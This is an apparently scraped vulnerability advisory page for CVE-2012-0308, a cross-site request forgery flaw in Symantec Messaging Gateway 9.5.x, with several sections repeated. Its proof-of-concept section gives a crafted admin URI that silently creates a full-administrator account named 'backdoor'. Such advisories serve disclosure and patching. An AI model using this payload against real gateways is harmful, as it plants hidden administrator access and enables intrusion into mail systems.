Symantec Messaging Gateway CVE-2012-0308 Cross Site Request Forgery Vulnerability
BID:55137
Info
Symantec Messaging Gateway CVE-2012-0308 Cross Site Request Forgery Vulnerability
| Bugtraq ID: | 55137 |
| Class: | Design Error |
| CVE: |
CVE-2012-0308 |
| Remote: | Yes |
| Local: | No |
| Published: | Aug 27 2012 12:00AM |
| Updated: | Dec 03 2012 07:40AM |
| Credit: | Ben Williams |
| Vulnerable: |
Symantec Messaging Gateway 9.5.1 Symantec Messaging Gateway 9.5 |
| Not Vulnerable: | |
Discussion
Symantec Messaging Gateway CVE-2012-0308 Cross Site Request Forgery Vulnerability
Symantec Messaging Gateway is prone to a cross-site request-forgery vulnerability
Exploiting this issue may allow a remote attacker to perform certain unauthorized actions and gain access to the affected application. Other attacks are also possible.
Symantec Messaging Gateway 9.5.x versions are vulnerable.
Symantec Messaging Gateway is prone to a cross-site request-forgery vulnerability
Exploiting this issue may allow a remote attacker to perform certain unauthorized actions and gain access to the affected application. Other attacks are also possible.
Symantec Messaging Gateway 9.5.x versions are vulnerable.
Exploit / POC
Symantec Messaging Gateway CVE-2012-0308 Cross Site Request Forgery Vulnerability
To exploit this issue, an attacker must entice an unsuspecting victim to open a malicious URI.
The following example URI is available:
http://www.example.com/brightmail/admin/administrator/save.do?pageReuseFor=add&id=0&userName=backdoor&passwd=muhaha3&confirmPassword=muhaha3&fullAdminRole=true&statusRole=true
To exploit this issue, an attacker must entice an unsuspecting victim to open a malicious URI.
The following example URI is available:
http://www.example.com/brightmail/admin/administrator/save.do?pageReuseFor=add&id=0&userName=backdoor&passwd=muhaha3&confirmPassword=muhaha3&fullAdminRole=true&statusRole=true
Solution / Fix
Symantec Messaging Gateway CVE-2012-0308 Cross Site Request Forgery Vulnerability
Solution:
Vendor updates are available. Please see the reference for more details.
Solution:
Vendor updates are available. Please see the reference for more details.
References
Symantec Messaging Gateway CVE-2012-0308 Cross Site Request Forgery Vulnerability
References:
References: